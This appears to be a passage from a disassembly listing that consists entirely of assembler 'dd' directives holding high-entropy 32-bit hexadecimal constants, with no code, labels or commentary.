dd 19D3FD17h, 4D9D0EB3h, 51884E27h, 877928ACh, 0A21B0400h
dd 8760209Fh, 509F1104h, 0CBA5F8CCh, 575FEA05h, 51D75FAFh
dd 0EB067B37h, 764FA4A1h, 6ABB621Ch, 0FD5D6315h, 0FC282545h
dd 9809E7AEh, 14757E9Ch, 0EFA3888Bh, 5CA04CA4h, 0A9CD7788h
dd 0D250CF86h, 254EB9B1h, 0EFBDCA09h, 0B4AB1844h, 40EAD503h
dd 93B2B35Eh, 0BEEE156Ah, 2BF74686h, 1182C929h, 6095A829h
dd 8FC1AB51h, 0DF3BF1E8h, 9352EA11h, 775619E9h, 72D02F46h
dd 0DD84EC22h, 7D1DF1A6h, 529D4B2Ch, 0D2222DD3h, 0CC2E946Ah
dd 0CB69C2B8h, 74C838BCh, 0E45E28D7h, 4AAA0C4h, 1184C80Ch
dd 0BF95AC4Eh, 30EC51D9h, 0AFD167B2h, 0E786CAB8h, 4CB66DA2h
dd 307E6BFDh, 0BDD202FBh, 0D60D414Ah, 0C97116AFh, 314301E4h
dd 7875EB8h, 6F4590FCh, 0EBB2FC57h, 4E319662h, 5DCF8C6Dh
dd 24F43BE8h, 0C98100EEh, 0B3327301h, 8D9B71A8h, 96603EB8h
dd 8C041755h, 0AFC3F81Eh, 0D8086CE4h, 0AA18FD04h, 0B3625C70h
dd 8FE80E0h, 0C4305DEFh, 15762EBCh, 6CF8164Ah, 31B764E7h
dd 4155C5FEh, 50CC5863h, 1E91F638h, 2BB992AEh, 0B52A857Dh
dd 3EDF8A84h, 7E83E11Bh, 2BC60528h, 48049177h, 2EB3A03Eh
dd 1EAFE41Ah, 9CC58554h, 959BF5A7h, 0DCC6703Eh, 0AFBFA495h
dd 0FF844964h, 18175381h, 840B83D9h, 0F15A20E9h, 0CF5CFB1Bh
dd 12BDA12h, 0E12B3F61h, 798C0B60h, 0BEC23327h, 1502EA8Ah
dd 0F918C82Ch, 4440D689h, 77ED7AAFh, 0C822769Ch, 88A46C1Dh
dd 3596439h, 3A553D10h, 59DB92AAh, 0D72D14E5h, 0A5C92469h
dd 220A197Fh, 0AF5E7546h, 0C06012E1h, 70FD7D62h, 98FCDAC5h
dd 0E86A7C8Dh, 2407BC6h, 96969556h, 654AB961h, 0A451235Dh
dd 4556A864h, 3F8ED6E9h, 30993490h, 0AB9B03Ah, 6C08C63h
dd 0AE8B70Ch, 9DCC4918h, 69EBA3B7h, 0A28C4F8Ch, 30DA2FF1h
dd 1E1868BEh, 0C08D8458h, 492DB9DBh, 0D81F8DD6h, 0FD158D27h
dd 0AC266451h, 739EF714h, 0ADB38B25h, 4DD78BAFh, 0E049A19Ch
dd 22980805h, 5C3245C6h, 85F50461h, 8A180598h, 0B860B879h
dd 52A90F58h, 2432060h, 640FB014h, 0BEACE66Ah, 6D945400h
dd 0EE240DECh, 18C60A82h, 0DB04EC12h, 0DDC00B98h, 0EB427D50h
dd 8C0A6D6Bh, 0D1270C0Ch, 153622FAh, 85205770h, 0D4AA12E9h
dd 0B0C43C57h, 662007EFh, 7F6B3246h, 48EE2BEBh, 11498BBFh
dd 8BC855F1h, 68D082EAh, 0FC61C6E9h, 6DE04055h, 32E4625Ah
dd 717C4CBEh, 4675B01Ah, 71FFEC54h, 1504105Fh, 0A8044A8Ah
dd 0A446A824h, 0DD0493EBh, 9CBFAC21h, 0C982841Ah, 0CC67D61Ch
dd 54C057ECh, 8D8BE010h, 0C68B6EACh, 43EBC6B2h, 2C0FEB10h
dd 0B33154AAh, 5474CCF3h, 5882C411h, 2F83B65Fh, 33F845F7h
dd 39FBFA49h, 328F651Ch, 248F6052h, 329C1E4Eh, 0CF2E184Eh
dd 0A284C9ACh, 808D6376h, 5B8CCB5Bh, 4988FB5Fh, 51465AB2h
dd 10453611h, 0C6055F58h, 18155197h, 85D52B41h, 0DD800813h
dd 3F9877EEh, 19C8DD97h, 55C1C631h, 0C1F92831h, 8440F7F4h
dd 0FA67FD44h, 10CC9980h, 0EE708D24h, 9A78230Bh, 0C3BDD15Eh
dd 0DD0C080Ch, 30A83BE1h, 1332B05Ah, 0D8A8D388h, 70FB2E55h
dd 1DDC6A0h, 0BFA90543h, 1612FA4Dh, 4B44B7EDh, 0E15C49E3h
dd 59B3E954h, 6956D4DFh, 0CD99C812h, 511A5DF9h, 51C8AFCBh
dd 7ACB8718h, 9086AAA1h, 0B225FD4Ah, 0C068190Ah, 0C5F7A202h
dd 1692E11h, 819C9F0Dh, 0F41381C1h, 709C13C5h, 6DD9C638h
dd 154ADD54h, 9457FA54h, 989548CAh, 44D11747h, 98CE2190h
dd 0BEF27512h, 37E517F0h, 3740BA44h, 24D29FD9h, 5D1744FAh
dd 94BECAF5h, 8A8395C5h, 6A2BC31Fh, 0A0372D0h, 1F2ABDA2h
dd 8C69B287h, 7F5EC18Ah, 67F6B1E6h, 0F88C66AAh, 0E3D8AB33h
dd 72A9268Dh, 0D5880B7Ah, 69ADF0F6h, 183CCC64h, 4A5B1248h
dd 204D55DAh, 2905FA89h, 0ABF604D3h, 24FC62BBh, 0E6086ACBh
dd 99921015h, 0B1EC5997h, 970C8EC5h, 7DDECBE8h, 0A42B9775h
dd 0DC0EDE36h, 8AA29A63h, 6CDA3182h, 1C830470h, 3113BD53h
dd 13E7F292h, 0A03901C7h, 887A563h, 93DD50D2h, 609EA1A3h
dd 0E14A8277h, 72A7128Dh, 9410A83Eh, 0F4B57C1Bh, 27ACBF21h
dd 0CAFA4551h, 0FD21F21Ah, 47C083F8h, 82D59ABBh, 0EA973D44h
dd 321822A9h, 933FD466h, 7C44CE6Bh, 6A82FA15h, 1FE03231h
dd 0D7CB3182h, 968F2FADh, 86ABB8FEh, 1468A06Eh, 0B85E068Dh
dd 6E866B4Ah, 30FF05C8h, 495E3530h, 2EF889F3h, 1196055Fh
dd 260ADAA8h, 22E78821h, 0A1FEDC88h, 0D975179Bh, 8021601Dh
dd 2F90A1BFh, 0E615BFCAh, 0D42A5C1Fh, 0C4F7390h, 0E7AE21F9h
dd 0D184A308h, 2503E10h, 0F60EDC18h, 0A62D48C3h, 8BB24E67h
dd 0EB54885Fh, 0EF405A92h, 7D44C6B2h, 18CA643Fh, 463E8AF1h
dd 8B7A490h, 0C505952Fh, 87B51E8Ch, 15923B9Ah, 0BF99F386h
dd 686CC632h, 2421E9C0h, 2D1A5749h, 0AFFD4B79h, 33ED864Ch
dd 7E08D639h, 4AD6B3DAh, 0AE7CAEADh, 5A35DF9Fh, 56C4B116h
dd 0BE0F80DBh, 0CD5CED30h, 0A277BB4Bh, 1B08BA2Bh, 9B30446Dh
dd 0B3DC1A92h, 368D223Fh, 0D4C37E20h, 9221A02Ah, 401ADDD7h
dd 0E3F4DF04h, 0FB07374Fh, 9AEB6D43h, 1019C782h, 2E02A923h
dd 2848D409h, 2025414h, 0D0DCC5C9h, 2B1785FEh, 1A585F1Ch
dd 0D9FCD6C8h, 0E02DAE95h, 80BA756Eh, 0E5304969h, 45C4438Ch
dd 5DA8BE41h, 0B4BE9862h, 1CB213B1h, 0D8027A0Dh, 5DFC715Ah
dd 60432271h, 4EA05D20h, 4B128A83h, 5888BD0Bh, 26F223EBh
dd 3156BEF5h, 0CFD0FED4h, 4D224AD9h, 0F580EC15h, 552B986Eh
dd 0FAC63DFBh, 0FF83FAEAh, 0D6B94985h, 0ED7F39B5h, 0D5D89DFh
dd 0D7026475h, 9B604FBAh, 0AFEC614Fh, 35884ABBh, 8628466h
dd 2AB9C416h, 0E36FFE89h, 8BFE7489h, 1B16BE02h, 9EB6EE5h
dd 9BD4BF22h, 80EC630h, 2955E64Dh, 5FE5372Ah, 0EC892355h
dd 58EA28B3h, 0F6AEADF8h, 54CC9554h, 0E21F1461h, 3BA8ADC4h
dd 0EE540150h, 0DB8AFAF6h, 3618FC3Eh, 0CFC76F94h, 0AFE9D21Ch
dd 0E6A7F92Eh, 0EF7A0C5Fh
dd 88CE50C4h, 4A190083h, 1A05F53Fh, 4808A43h, 5A282609h
dd 8AD72929h, 0A53806CDh, 0C02D85A0h, 5A26EA16h, 0F5A63038h
dd 6F529035h, 40744AD7h, 253C6118h, 0CB4C8C2Dh, 6759C202h
dd 81A87A02h, 8BA94C11h, 89E342ADh, 0D58B9B96h, 659D5396h
dd 2E941469h, 0D870F91Bh, 9BC9B99Fh, 1A572808h, 65F5AF50h
dd 18B1D66Eh, 0C6B49B65h, 97877A07h, 54AC511Ah, 0CA7D9984h
dd 0DD76E078h, 988A9098h, 98D3ECCAh, 2405EF51h, 3929ABABh
dd 35A65C84h, 3C089AC4h, 0C99980Bh, 6584784Dh, 228B7651h
dd 0BC18ECEAh, 532B79B4h, 83A92B27h, 20205D3h, 1BD37F40h
dd 7F11ADE2h, 7194415Dh, 0D0792FEAh, 0D4D47A12h, 0B208D4DDh
dd 0DD9581FAh, 0A1AC5C8Dh, 5AB21C86h, 0D4645227h, 4A697E9Bh
dd 3D40AE63h, 6EEC176h, 62F7142Fh, 2564B88Ah, 282AAD0Ah
dd 4881437Fh, 0A6F3DC25h, 1E64AFE8h, 0C6DB71C4h, 0FCDBF59h
dd 0E43BEEEh, 0FEC0AA1Ch, 0ABDD05A2h, 0A1982AE8h, 0A6EF50BFh
dd 8BA58C95h, 0E6797079h, 95DB317Ch, 45E31184h, 0B37794AFh
dd 35C917B7h, 32D26E64h, 696380ACh, 0D2482B1h, 185F43C3h
dd 9B120E1h, 41017893h, 24C6A8E4h, 0C3DA30BFh, 0FAE3B5B2h
dd 0D58DA09Bh, 5B1F5616h, 2F51245Fh, 8107155Ch, 0BBA2869Dh
dd 3DC779BBh, 0CE88C66h, 0A565823Fh, 0E830C486h, 746D5F24h
dd 2A057FA9h, 5A312CBBh, 7828B315h, 18B57094h, 0E47116EFh
dd 67572C08h, 0D6238ADBh, 534265ECh, 8637BD74h, 902437F7h
dd 0AE355530h, 0A78494E2h, 7ABD1710h, 354E627Eh, 67F6DB5Ah
dd 0AAD5CC66h, 8CB6174Ah, 1CA5271h, 9A2ECF11h, 0A1ABA175h
dd 0C0F95731h, 0C0C303F2h, 0E328D432h, 0CD68DF84h, 0DE5F352h
dd 8601BE28h, 0B477B7E6h, 687933F2h, 0E5508A03h, 40B01E59h
dd 21111698h, 7F6788F6h, 0B1838B81h, 9052EF00h, 0AB3ABD29h
dd 62480B2h, 0A09EF02h, 2D630471h, 0ACE04A32h, 680C13CBh
dd 118F6C7Fh, 85602641h, 0D91E7662h, 0EC3E365Fh, 30C57191h
dd 3EB0D8ADh, 2B59ED5Bh, 9D437C68h, 8EFA5908h, 462497DEh
dd 1A929C8Dh, 92D19CDCh, 0AFFBB623h, 61609461h, 0C22BD72Ch
dd 136D0B8Ch, 4A13D2BEh, 8D841DF8h, 87CA6A43h, 0CB6B82B3h
dd 29750548h, 18CA29A7h, 2999844Eh, 90526BA1h, 0E5D25C02h
dd 0CE0D28DBh, 218D0F68h, 8B1EEB16h, 0D22C032Fh, 8E618A1Eh
dd 7C14A7CAh, 8EA7BDE6h, 8E884FF2h, 0FA5EE68Bh, 0B50664FDh
dd 32A05369h, 0CBC36626h, 0B126C360h, 7B7528DAh, 34EF4A98h
dd 0E8ECD65Ah, 0BA6FEF7Ch, 40492038h, 0F6B7E17Fh, 3516571h
dd 671E1147h, 0A77E4B13h, 577DC681h, 0FD4B7F6Ah, 1CA9EC37h
dd 2138F05Dh, 9CEF8408h, 55EA0198h, 9B66D01Fh, 776463B0h
dd 84D3E120h, 1602BF14h, 0DA2384A4h, 0AC717833h, 0C79B0C76h
dd 7FAE5E9Dh, 45274018h, 0CB991CABh, 0C9867D7h, 19284Ch
dd 238192FFh, 4D8AABDAh, 466C259h, 0D120638Ch, 5202679Ah
dd 54055902h, 4A220B6Dh, 0F72A70ACh, 35FBE59h, 0C08F72C5h
dd 1420A3C7h, 4131BBDh, 9B09FCF6h, 0FD4BFD49h, 9E71640Fh
dd 867DBAFBh, 64FEC853h, 0D107804Ah, 0F009638Bh, 0EDDFFB5Ch
dd 0B6A83E0Dh, 0A9AD44BEh, 42D0296Bh, 0CE7DCE1h, 83E1D5BCh
dd 59ACC2B3h, 0D47ABEDAh, 97FBD54h, 65FDADA4h, 18CC6DA9h
dd 49DA372h, 0CD519AB6h, 0F66751C4h, 958155C7h, 6C1904FCh
dd 0D3213310h, 0C13A924Eh, 0D957A6D1h, 0F7557A8h, 18B92032h
dd 0A3778754h, 899951B2h, 2E3F1D64h, 4594393Ah, 5613BDD0h
dd 525F766h, 0E3071BB5h, 235F21BCh, 532ECD11h, 41CF07F3h
dd 8260B046h, 95E85EC1h, 8D0A3AD9h, 0CAFC7EFEh, 680FD3h
dd 0E4C8EB13h, 86D436BFh, 0E3B3D9F7h, 6ABD2966h, 998AF802h
dd 95AA8665h, 5F75384h, 9E34218Dh, 5D0222A4h, 0A15A42D7h
dd 57FCBFD0h, 0D03A89D6h, 2FE94F58h, 0E7791CE4h, 0D1A487B6h
dd 0BB8C025Fh, 0BA2ACAB2h, 335E88E2h, 0B63F11B7h, 0D2DE0678h
dd 5A9F5AB2h, 0D5FA974Bh, 463E6DE8h, 0B4E866F5h, 3A06994Fh
dd 0FD03FED3h, 0F78F5399h, 4DD1798Fh, 0B9A7A28Ah, 0BB36BA15h
dd 85080948h, 44F80307h, 0C648A53Ah, 0EE334091h, 561841AEh
dd 0BFA6E277h, 57D19BA0h, 0AB308401h, 0C7630FA9h, 4D0616D4h
dd 5C5E7093h, 206FE406h, 0B1E8818h, 0BEE1189h, 5307D770h
dd 0DE312D6Dh, 6A628044h, 0F411179Ch, 9A8A9FB5h, 0FA7E1D52h
dd 0D3190510h, 28C3123Ah, 15C56A83h, 32B971C7h, 72E1677h
dd 735405FAh, 0C466F585h, 0B8D405DBh, 98E93613h, 0BBA5926Ah
dd 0ACC773A1h, 0DAA52C46h, 63BD4E57h, 0B8F2C16Dh, 87AD0087h
dd 3EBF9829h, 21741850h, 746B89A4h, 34EC5C59h, 922E6E2Fh
dd 0F202F5C6h, 0BEFBFB2h, 0FC203CE4h, 0DDA291DBh, 8AD7D837h
dd 0E8326BB0h, 3CC14852h, 8A8766E2h, 4BBDB296h, 433B0DE3h
dd 45FD7BD5h, 1983AD1Fh, 40FE9CF2h, 4C625F68h, 0C9E14417h
dd 0D15C9A25h, 0DD71BFCBh, 643DB54Bh, 3D8FCC6Bh, 0E2E94469h
dd 6415ACE0h, 0A78CB50Ch, 0A5B7707h, 5FF3541Eh, 48C6B153h
dd 6107AD63h, 8ABA64B5h, 5AE477CBh, 0F0D7D25Dh, 729E1477h
dd 68EEDA5h, 8568749Ch, 0F23906BFh, 0C215AA2Bh, 0EAFE26AAh
dd 9AE92570h, 94E16833h, 6181FAD5h, 4083CAFAh, 33278886h
dd 0F4DE3BEDh, 745F466Dh, 0DEF877B1h, 4682C719h, 84C04C54h
dd 1CE53F66h, 0D7DC9F45h, 0ED0225A5h, 0A82B8C08h, 8C76D502h
dd 0A664BD5Ah, 201E8290h, 90558CC2h, 8C6BDA32h, 7C9611F3h
dd 889CFC45h, 9B5AF161h, 0BF468DE2h, 589EC629h, 40987ECCh
dd 9AC360CBh, 9012C59Ch, 2C2B3442h, 73572C87h, 0DE2B2041h
dd 0DFEBAE04h, 2FA91943h, 0FC7B564Ah, 6002F8CAh, 0B80D2626h
dd 17C190CAh, 1C99442Dh, 35AC1ABh, 0BF31AAB0h, 8611EDEAh
dd 600148AAh, 71764B4h, 0CDA0BB8Dh, 68C22B6Fh, 0A6D29211h
dd 0EAEA4154h, 0D81D0208h, 68C45F61h, 2BB1D3A9h, 0BA5302F8h
dd 7A03048Bh, 559205D3h, 4F459105h, 0C82B5830h, 4756D18h
dd 0C6A085D7h, 0C9A8D33Fh, 55D8409Dh, 9A34AFD7h, 8639124Fh
dd 524B3534h, 0FC3E964Ah, 77406857h, 0C291CC46h, 0E9C657Fh
dd 0F531014Ah, 61696539h, 2C6A7818h, 116BC658h, 41F32E84h
dd 0C674BA05h, 5338F2Eh, 352A0B1Ah, 0DA897360h, 0C62586Ch
dd 86A005h, 0EE109A7Ah, 3459010Ah, 8AAAA5D4h, 0D10D493Dh
dd 0C0350EDh, 0BFAA965Fh, 50D5C831h, 0BC521475h, 4164774h
dd 8801D158h, 71952BD9h, 96698A44h, 715500Dh, 0D030E584h
dd 54EF0894h, 824256CFh, 76102D47h, 89100C30h, 4106D43Ch
dd 60A660A1h, 31738391h, 6AA66067h, 35B57A6h, 7598E6E5h
dd 823A1BEAh, 34636AD1h, 0C64C068Fh, 76EF709Ch, 810D237Bh
dd 0A5C786EBh, 4756E181h, 0E95662EFh, 0A5F5DE25h, 5948A3DAh
dd 0C3E0769Dh, 888FED97h, 0E76EC325h, 36D82AE3h, 388FF595h
dd 602F3A19h, 85E65D0Ah, 642307ABh, 0A1B44F1Fh, 216804DFh
dd 0CC73638Fh, 44723362h, 0D766AD0Bh, 0C235BF73h, 6F6AB41Fh
dd 388F0830h, 31B813D2h, 14734BD8h, 169809E9h, 842227F0h
dd 76E11C19h, 0EC751835h, 5F78A797h, 0E2FF8BD4h, 517D328Bh
dd 93D10A86h, 4064C434h, 9F670B47h, 2D0C6AEAh, 68E4398Ah
dd 69816179h, 0A6E0E194h, 534C1665h, 300CD6D5h, 0B1382D50h
dd 799780AAh, 65FB6018h, 8F52DA36h, 65144015h, 12BE971h
dd 38C65353h, 0D2CCF03Ah
dd 61FD2058h, 43D4A945h, 2358441h, 0DB569ADDh, 0FCF69C00h
dd 994A755Ch, 0D3D0F0A2h, 5752735h, 18ACFC2Eh, 0B37DB62Bh
dd 761183A8h, 1C412B37h, 9F7182E8h, 9EBAB410h, 5E9C9639h
dd 111A31Dh, 1B6B84D7h, 0D16159B3h, 758166A3h, 0D8154307h
dd 9ACD02D1h, 1C6612CDh, 0AEB575EDh, 0E6BB7151h, 0BF9B9819h
dd 6EF971AEh, 6F63A8A2h, 0FC2251CCh, 0F32502FDh, 0CD03CF23h
dd 775E6785h, 594E9D54h, 3C517348h, 45598EC8h, 95050C79h
dd 5CF3C30h, 0A5466F5h, 4A1F8E07h, 97018D78h, 5957B63Fh
dd 25C0A6Eh, 9446EBB8h, 1912AA29h, 414159CBh, 9221514h
dd 0BFB1980Ch, 656143F0h, 15CF75Dh, 5513D550h, 3114B226h
dd 0AD4B28C5h, 0F4935184h, 3330B742h, 5A90D72Bh, 82F060B5h
dd 567F8B92h, 0D046517Ah, 0A2875AB2h, 12AF2E15h, 0AA2DB760h
dd 20E6E2F1h, 8A2AB2B4h, 0ACD8A218h, 0EFFE6E43h, 5DE4107Ah
dd 520F4BFCh, 7E82168Ah, 0C4FA4330h, 0FC7A5109h, 0B8729EE1h
dd 0FEA2E12Ah, 575A26F6h, 0AADD1457h, 4499942Ah, 6EDBE904h
dd 0DBDAFB4Eh, 7CDE8594h, 1B6FAE7Bh, 8BB45230h, 4ABA5B61h
dd 8655B5D2h, 0AACDB67Bh, 31A19F55h, 0EEAAE0B5h, 9C55F46Eh
dd 4F79B4DFh, 0DA5701F9h, 119045B1h, 0B155C143h, 71213E5h
dd 9334346Bh, 0A371D8C2h, 86EF4E25h, 2FC3DC2Ch, 1A2DD1E7h
dd 0D300F9C2h, 64154D1Fh, 5F1CBE38h, 0FE0061AAh, 220B5E92h
dd 59B4E455h, 0ABE3100Eh, 0D2107F63h, 0EBD190A5h, 3686C0B1h
dd 6224DAA1h, 26044691h, 1AEB8E30h, 786064B1h, 99CDD67h
dd 8A284926h, 0BBB1BA06h, 5555C7ECh, 1191512Ch, 1DF80D0Ch
dd 0DF9BA439h, 0F64C2FACh, 6DA1F237h, 0D26153ECh, 5C16B388h
dd 0C467D8D8h, 1DD3DEDh, 5F292741h, 306FA421h, 0D5C28B61h
dd 0C0392AE9h, 0C8423790h, 0CC5DDC17h, 0C5D74049h, 9BC4BF10h
dd 59D0A801h, 84F63801h, 998B5F84h, 56620B6Dh, 0A7D12AB9h
dd 4508381Bh, 0F184C49Fh, 0AB94A82Ch, 0E1B279ECh, 3F0F46DEh
dd 23235064h, 0B0D2B9E2h, 0C5CFA531h, 0DBEBE929h, 9B886082h
dd 44988A3Ah, 82C80E9Fh, 0BA810A08h, 5A1B8481h, 0E1D58DDFh
dd 0D4A2171Eh, 3C68E57Eh, 65D48EAAh, 8D19BE44h, 44EDAAFFh
dd 0A331F6BAh, 7F4016ECh, 0C4D79727h, 0BA638233h, 0C238C32h
dd 0E9C3F2F9h, 1969AB92h, 58A0D0C4h, 6198B171h, 0ED50CE3h
dd 9C1358C0h, 4D018430h, 0AF132A05h, 0FFD8FA8h, 9CBAFA36h
dd 0DA8437C4h, 6C088747h, 0E6A16FF4h, 1B837A47h, 2AE5B45Dh
dd 0EA6FF883h, 0A8C814C7h, 7DE5BCA1h, 8C071D67h, 0F529E52Ch
dd 3A7B1595h, 5DF7197Fh, 6460E0C4h, 9B0ABFB6h, 0B01C2A2Ch
dd 0CA07BD35h, 46B5C421h, 62D6C547h, 31394D0Bh, 911CE603h
dd 705BE02Ch, 1C207821h, 892F0F4Dh, 0D04710E1h, 0E86B925h
dd 8A9F55A1h, 5567602Fh, 4EB980Ah, 5AD43ED2h, 0E1F88CD0h
dd 0E698048Eh, 0C7F92BE7h, 6330BE32h, 0C1176C92h, 2E0A3ECCh
dd 1DCA1FD7h, 0B3C7B8B2h, 0A339862Fh, 0B57018Ch, 0ABB0CD68h
dd 2FBEC994h, 0D4BBB4C5h, 45CA0835h, 36D4AA7Ch, 498D1D8h
dd 31749170h, 0C63329E9h, 0D5D02045h, 0A5E0B809h, 5953580h
dd 544A44A8h, 43D318E9h, 497A2250h, 613094ABh, 77B13D64h
dd 891AB98Ah, 0C25D1248h, 89010483h, 464FF044h, 20A6A83Eh
dd 3B8D7D11h, 0DD563F00h, 1892A1FFh, 938AA0B2h, 110CC12Bh
dd 776D6DF3h, 506F982Ah, 6E035351h, 0F473C55Dh, 147C8D39h
dd 0C5DF2FE0h, 4A2D21B0h, 32929DA0h, 0B6F01FC8h, 5B58FBA2h
dd 88A4E54Dh, 0EAF6AAD8h, 1C32E042h, 35CD8964h, 0E22A2975h
dd 0B62E8168h, 5662287Ah, 6D1B9B70h, 0BA39EE35h, 711607C5h
dd 1477EAE4h, 671752E9h, 9CD5AF47h, 2F0773DCh, 91C78C8Bh
dd 1F589220h, 0C22EB645h, 0F331B78Fh, 4799BC7Bh, 2EB784E1h
dd 0BDA8BDEAh, 0F1CCB805h, 21BC8A87h, 31278331h, 0E2F2F30Fh
dd 62BF3112h, 0D70AB0D5h, 0B6621576h, 0FD4ABDD2h, 675D2D80h
dd 50248C44h, 945112B0h, 754F9FB3h, 1F4695DBh, 9EE2414Ch
dd 0C0875B74h, 0A8C5EFBFh, 6E92BAC4h, 0AFE2E7C4h, 7AE27C49h
dd 24B4A6ECh, 0A916EB75h, 0C1513361h, 8ED38462h, 0DDCE9332h
dd 0E5C420C1h, 245936BAh, 59384343h, 0F2853F40h, 25668343h
dd 0E40995D1h, 0D8C79C89h, 376373EAh, 0B64F6ED5h, 9737903Ah
dd 0AA677111h, 5CFE7EE2h, 9860D9C4h, 0F4161CE2h, 8B36525Ch
dd 9790923Dh, 0AF981413h, 173AFBC0h, 7240AA58h, 3682E405h
dd 99644222h, 0A6C3CE01h, 0E8A3C03Fh, 1D4029B8h, 53F5C252h
dd 3A314875h, 0FDFF95BAh, 158699ACh, 7AA9383Eh, 6031A4C0h
dd 0E4180A44h, 952650E1h, 3066DE38h, 4C559A02h, 0D11C1F91h
dd 0B2EF8166h, 0AC266052h, 98ACDDF9h, 4904094Ah, 0DDACC675h
dd 1AB4194Ah, 5D58BD20h, 59863D6h, 0C629356Ah, 461BE545h
dd 5C203F8Fh, 0E15F32B8h, 0A00A28F7h, 93669054h, 72884661h
dd 801AC4E7h, 0C6EFA332h, 33AB7712h, 52EC7C00h, 1D5C25BEh
dd 5813AAC6h, 2E772DE6h, 0F22D88Ah, 0C0206A7Bh, 76CA7Bh
dd 24AB7715h, 89D414E6h, 611254A1h, 4F360976h, 6145B893h
dd 95E7159Fh, 0B4C29C62h, 9FC61AE4h, 5998D5DCh, 990188E9h
dd 170B1AD3h, 2055BFC1h, 0FBF4001Ch, 0C02F89D9h, 7EAA1A07h
dd 8F14C6BEh, 0F23ED32h, 0E5F73717h, 8184E381h, 4B10EB5Fh
dd 423C2E0Eh, 8BBD5327h, 0E369782Ah, 0A51A1F77h, 0C2ACA17Bh
dd 6CA03A47h, 2501E8D4h, 7CD708Eh, 81744B70h, 0E6121994h
dd 26E198C0h, 0C19E3F96h, 46F90835h, 0AFC9FB01h, 4F3EB51h
dd 0BAA922E6h, 41DEAAC9h, 8794B998h, 50148A14h, 0A1747E46h
dd 69B42789h, 269ACA42h, 2694CAAh, 0B62304CBh, 0E0208C4Ch
dd 0EB62975Bh, 7AB8DE11h, 1EA65844h, 57989641h, 0E24D3162h
dd 0C069BE4Eh, 0F5A3899h, 393C5A32h, 0E01FA1EFh, 17B871D5h
dd 0C55E6A64h, 10880B1Eh, 591FDAE6h, 0E6465297h, 2798BB6Eh
dd 57FCFD70h, 7AF2465Eh, 0CEAFD437h, 89C2E0FFh, 9BC45449h
dd 6459DA17h, 1D569AABh, 2DD53445h, 0BA2BFBCCh, 3466BCFCh
dd 260961AEh, 56686F58h, 9C7534F2h, 40CACD0Ah, 57A84639h
dd 9687BA7Fh, 0CA6A4721h, 4D1157A4h, 0D3CCD516h, 2F5D4751h
dd 0B532DC0h, 3700448Ah, 2087EFE7h, 2E2FC581h, 5CB21A40h
dd 8EA2B560h, 0F7F23109h, 0AA8A5B4Dh, 14C04833h, 43433B91h
dd 0C16DAFBAh, 0ED5D92B0h, 0D6748BF5h, 8894544Fh, 0D65411F9h
dd 44E07411h, 313436EBh, 3C85515Dh, 816104DDh, 16657176h
dd 4536D6E4h, 23ABB53Eh, 8483AC97h, 0A2EAC47Dh, 0E61822CEh
dd 0C185412h, 0E3F992E3h, 77EC755Bh, 7820AA91h, 15F014DFh
dd 0B550EBCDh, 5669D292h, 98362D04h, 0A7548D21h, 9F322FB0h
dd 86F2917h, 927785F6h, 911A1C74h, 9C0F777h, 37366757h
dd 0E1DB84ABh, 0E1F01D74h, 0E040D6CDh, 413FC4ABh, 0D5B716A3h
dd 0B889FD65h, 0FB4BC81Fh, 0EA941DBEh, 31B3C3F2h, 1C868BA4h
dd 0DD4037ADh, 0A48A2122h, 7D711554h, 0BD88A808h, 287E687Dh
dd 0A3BE7DF0h, 0A90C0CAFh, 0DEC8AE9h, 5C546A11h, 95A01566h
dd 84261B51h, 0A8AA5854h, 0B0D96B6h, 464CA996h, 0E5D10A2Fh
dd 0C290A58Ah, 89C3751Fh, 0D61B3ABBh, 3F9088B8h, 323ECEB9h
dd 6EFDF4h, 0C0FC0218h, 14553DC8h, 0E864752Dh, 0EDBF1AB1h
dd 3BE22178h, 33148E98h, 949D9898h, 5A107604h, 0A852FE2Eh
dd 44429CAFh, 0DCD692CBh
dd 0AF483ABEh, 7B3C4F57h, 95AADF5Ch, 33D0A71h, 406348A3h
dd 2FB6E60Eh, 0DF7097E2h, 83BE68A2h, 2A35ECFh, 0AE5CF21Dh
dd 0A0AE1097h, 3072BAC1h, 5D39F7F3h, 5EC8A067h, 0B427A144h
dd 265D2B92h, 9303AAF2h, 25EE320h, 5638BA73h, 0DA4F0284h
dd 71B4B468h, 0CCE95CE7h, 2F68289h, 29713707h, 8E09DA18h
dd 8EFC247Bh, 0CDF15752h, 0F6A8002Ch, 0F7903054h, 32DF8579h
dd 0F00D9486h, 963625Fh, 7168268Dh, 751F44E9h, 0EC3B590Ah
dd 8B246EA6h, 0A450F468h, 1C66631Dh, 0F1DE79CBh, 0BEF79997h
dd 91E10E14h, 5B9307D1h, 75F98FA4h, 4E74E10h, 8C4011BDh
dd 0AAA3918h, 0B205253Ch, 17B266C7h, 0D407EB82h, 0BE9997FEh
dd 1CF737F0h, 3EFD20EEh, 3FC5835h, 2C4988D7h, 0DB2BED5Eh
dd 0C43F89C9h, 574E6880h, 7DD0A0FAh, 636BB3Dh, 0FB25B0Ah
dd 57B120EDh, 96F2A0ABh, 4D8E5C34h, 60FE477Eh, 8AC0C382h
dd 0E4679FC9h, 0E23E2EC5h, 2AB5F4EAh, 5A6C4777h, 1C0D2840h
dd 61DD207Dh, 0B4BDF4B4h, 8BB7B703h, 0DBF5211Fh, 0A0B32E65h
dd 1ACCED5Dh, 0D2AC62B3h, 121BA820h, 6411BD07h, 9F7A4E62h
dd 0AEDDA81h, 0CB531DA1h, 1F08549Eh, 4D6AC17Dh, 4EE31F02h
dd 16109D02h, 0A183AA91h, 6FD2583h, 83189396h, 0BA88876Bh
dd 188264F5h, 0CCD4EB2Ah, 14E7CAB6h, 5753E2EBh, 84CB5033h
dd 3ED2D48h, 0F61680E9h, 0BF1C8DC2h, 82121AEAh, 0C5D08E4h
dd 43C1A0B8h, 5022D3A9h, 2379FEDAh, 47A2CC11h, 0D693830Fh
dd 0F62827EBh, 6020C59Ah, 51A0A350h, 0EB8F822h, 0B6CC8CA7h
dd 158A0833h, 449A6715h, 0ED8299FEh, 9BC4091h, 9714AFC6h
dd 55B44658h, 0B15B7391h, 0C8E030Bh, 2429ADAAh, 0C24D1808h
dd 1168CA02h, 6712007Fh, 0D83A46C6h, 33EC3B9Dh, 0DDEABD3Bh
dd 33402E4Bh, 8E836600h, 2AA2101Ah, 646B95AAh, 32B334h
dd 0C034194Dh, 2A2D8985h, 3CCE69h, 6034A395h, 0AF86D43Ah
dd 545EB17Dh, 0E659D291h, 0B18D9CAh, 180E4BB3h, 4FD700B5h
dd 0BB048CE5h, 59E57699h, 48108641h, 0DD827997h, 5DDA2893h
